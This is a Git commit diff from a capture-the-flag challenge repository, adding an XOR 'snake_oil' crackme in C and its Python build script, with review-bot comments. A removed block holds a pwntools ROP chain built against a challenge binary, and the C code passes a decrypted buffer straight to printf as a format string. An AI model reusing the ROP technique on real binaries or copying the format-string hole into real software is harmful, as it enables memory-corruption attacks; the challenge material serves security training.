Commit 1e4fb55c authored by GovanifY's avatar GovanifY

snake_oil done

parent f4070c10
......@@ -11,8 +11,10 @@ challenges done:
* simple_rop
* simple_rop_2
* web_server
* snake_oil
TODO:
* web_server_2
* snake_oil_2
* access_security
* modern_rop
* reverse
* misc format_string(?)
all:
gcc -w main.c -o snake_oil
strip snake_oil
......@@ -30,28 +30,36 @@ void snake_oil_crypto(char **argv) {
for(int i=0; i<sizeof verif_string/sizeof *verif_string; i+=4){
verif_string[i]=(char)((unsigned int)verif_string[i]^val[0]);
verif_string[i+1]=(char)((unsigned int)verif_string[i+1]^val[1]);
//--JUNK CODE--
//--JUNK CODE--
verif_string[i+2]=(char)((unsigned int)verif_string[i+2]^val[2]);
verif_string[i+3]=(char)((unsigned int)verif_string[i+3]^val[3]);
if(!(verif_string[i] == 0x00 && verif_string[i+1] == 0x00 &&
verif_string[i+2] == 0x00 && verif_string[i+3] == 0x00)) {
//--JUNK CODE--
//--JUNK CODE--
printf("Raté!\n");
return;
}
flag_encrypted[i]=(char)((unsigned int)flag_encrypted[i]^val[0]);
flag_encrypted[i+1]=(char)((unsigned int)flag_encrypted[i+1]^val[1]);
//--JUNK CODE--
//--JUNK CODE--
flag_encrypted[i+2]=(char)((unsigned int)flag_encrypted[i+2]^val[2]);
flag_encrypted[i+3]=(char)((unsigned int)flag_encrypted[i+3]^val[3]);
}
printf("Gagné! Voici le flag:\n");
printf(flag_encrypted);
}
int main(int argc, char **argv){
//--JUNK CODE--
//--JUNK CODE--
printf(flag_encrypted);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
// Set the gid to the effective gid
......
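Review bot: The loop `for(int i=0; i<sizeof verif_string/sizeof *verif_string; i+=4)` touches `i+1`..`i+3` on every pass, so unless the element count is a multiple of 4 the last iteration reads and writes past the end of `verif_string` and `flag_encrypted`, and the string terminator — which `sizeof` counts if these are literal-initialised arrays; their declarations sit above the hunk — gets XORed along with the data. A bound of `i + 3 < sizeof verif_string / sizeof *verif_string` keeps every access in range, and the terminator should be excluded from the XOR explicitly (a `- 1` on the count) so the later print stops where the flag ends. `printf(flag_encrypted);` then passes the decrypted buffer as the format string, so a `%` in the flag or a clobbered terminator makes it read past the buffer; `printf("%s\n", flag_encrypted);` (or `fputs`) is the safer form. `snake_oil_crypto` begins above the hunk and `main` continues below it.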
......@@ -21,83 +21,34 @@ for c in flag:
flag_enc.append(ord(c)^key[(i%4)])
verif.append(key[(i%4)])
i+=1
flag_enc_c=str(bytes(flag_enc))[2:-1]
verif_c=str(bytes(verif))[2:-1]
print(flag_enc_c)
print(verif_c)
s=bytes(flag_enc).hex()
flag_enc_c="\\x" + "\\x".join(a+b for a,b in zip(s[::2], s[1::2]))
s=bytes(verif).hex()
verif_c="\\x" + "\\x".join(a+b for a,b in zip(s[::2], s[1::2]))
replace_text("main.c", "VERIF_C", verif_c)
replace_text("main.c", "FLAG_ENC_C", flag_enc_c)
print(bytes(key).hex())
subprocess.call("make", stdout=FNULL, stderr=FNULL)
"""
# junk code generation
write_junk_calls("main.c", 134, 2)
write_junk_calls("main.c", 62)
write_junk_calls("main.c", 57, 4)
write_junk_calls("main.c", 50, 4)
write_junk_calls("main.c", 42, 4)
write_junk_calls("main.c", 34)
write_junk_body("main.c", 14)
# replace flags in source file
f = open("flag.txt", "r")
flag=f.readline()
flag1=flag[:10]
flag2=flag[10:20]
flag3=flag[30:40]
flag4=flag[40:50]
flag5=flag[50:60]
flag6=flag[60:]
replace_text("main.c", "FLAG_PART_1", flag1)
replace_text("main.c", "FLAG_PART_2", flag2)
replace_text("main.c", "FLAG_PART_3", flag3)
replace_text("main.c", "FLAG_PART_4", flag4)
replace_text("main.c", "FLAG_PART_5", flag5)
replace_text("main.c", "FLAG_PART_6", flag6)
replace_text_random_hash("main.c", "FLAG_WRONG")
subprocess.call("make", stdout=FNULL, stderr=FNULL)
# we generate the rop
elf = ELF("reverse_rop")
rop = ROP(elf)
FLAG1 = elf.symbols['flag1']
FLAG2 = elf.symbols['flag2']
FLAG3 = elf.symbols['flag3']
FLAG6 = elf.symbols['flag6']
XOR = elf.symbols['xor']
XOR2 = elf.symbols['xor2']
XOR3 = elf.symbols['xor3']
POP_ONCE = (rop.find_gadget(['pop ebx', 'ret']))[0]
padding = b'A' * 28
exploit = padding + p32(FLAG1) + p32(FLAG2) + p32(POP_ONCE) + p32(0xAABBCCD2)
exploit += p32(XOR) + p32(FLAG3) + p32(POP_ONCE) + p32(0xAABBCCD1) + p32(FLAG3)
exploit += p32(POP_ONCE) + p32(0xAABBCCD2) + p32(XOR2) + p32(FLAG3) +p32(POP_ONCE)
exploit += p32(0xAABBCCD5) + p32(XOR3) + p32(FLAG6) + p32(POP_ONCE) + p32(0xBBCCDDE9) + p32(0xBBCCDDE3)
# rop is saved as input
f = open("input", "wb")
f.write(exploit)
f.close()
# strip it after the ropchain building so they don't have the symbols but we do
subprocess.call(["strip", "reverse_rop"], stdout=FNULL, stderr=FNULL)
os.remove("main.c")
os.remove("Makefile")
os.remove("setup.py")
os.remove("flag.txt")
# TESTING BINARY
try:
output = subprocess.check_output("gdb -ex 'run < input' -ex 'print $eip' -ex quit ./reverse_rop | tail -n 1", shell=True, stderr=subprocess.STDOUT)
output = subprocess.check_output("./snake_oil " + bytes(key).hex(), shell=True, stderr=subprocess.STDOUT)
except Exception as e:
output = str(e.output)
if not b"0xbbccdde3" in output:
if not flag.encode("utf-8") in output:
fail_test()
"""
os.remove("main.c")
os.remove("Makefile")
os.remove("setup.py")
os.remove("flag.txt")
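Review bot: In the testing block the fallback `output = str(e.output)` turns `output` into a `str`, so the new check `if not flag.encode("utf-8") in output:` raises `TypeError` on that path instead of reaching `fail_test()`, and `e.output` only exists on `CalledProcessError` in the first place. Catching `except subprocess.CalledProcessError as e:` and keeping bytes with `output = e.output or b""` makes the failed-run path compare correctly. The escape builder `"\\x" + "\\x".join(a+b for a,b in zip(s[::2], s[1::2]))` emits a bare `\x` for an empty sequence and reuses `s` for two unrelated values; `"".join("\\x%02x" % b for b in flag_enc)` (and likewise for `verif`) is shorter and handles that case. If `flag` is still read with `readline()`, it carries the trailing newline into both the C literal and the comparison, which only works as long as the binary prints it back unchanged; the enclosing `for c in flag:` loop starts above the hunk.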